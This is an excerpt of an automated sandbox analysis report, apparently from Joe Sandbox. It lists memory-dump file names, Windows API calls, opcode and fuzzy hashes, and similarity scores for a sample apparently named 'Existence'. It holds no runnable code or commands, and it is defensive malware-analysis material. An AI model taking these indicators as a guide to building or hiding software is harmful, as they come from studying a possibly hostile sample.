                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                                          • Opcode ID: 756309002a9303c93e62c9578d5024bec50b5af8db47bb0fe2c3624551073a0e
                                                                                                                                                                                          • Instruction ID: c6c281221ff19bf3a2f429de2b6f1441b88e282d2e4f26631f41a75e84d8155b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 756309002a9303c93e62c9578d5024bec50b5af8db47bb0fe2c3624551073a0e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41D0C935395314A6E678B770AD0FFE66B54AB54B50F108879B349AA1D0C9A86840C658
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0076C213
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0076C221
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0076C27C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                          • Opcode ID: 762d888f67e1f7dadac72601bd6ca734a89fc741c1d9df10435e013ab27d638f
                                                                                                                                                                                          • Instruction ID: 109ae3b0095ef64b7407b8c93e1dfc34083f5bccd116ebaa72e867746cc4d4d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 762d888f67e1f7dadac72601bd6ca734a89fc741c1d9df10435e013ab27d638f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 31413831600205EFDF229FE5C854ABA7BA5FF05310F254169FC9BAB1A1DB389C01CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%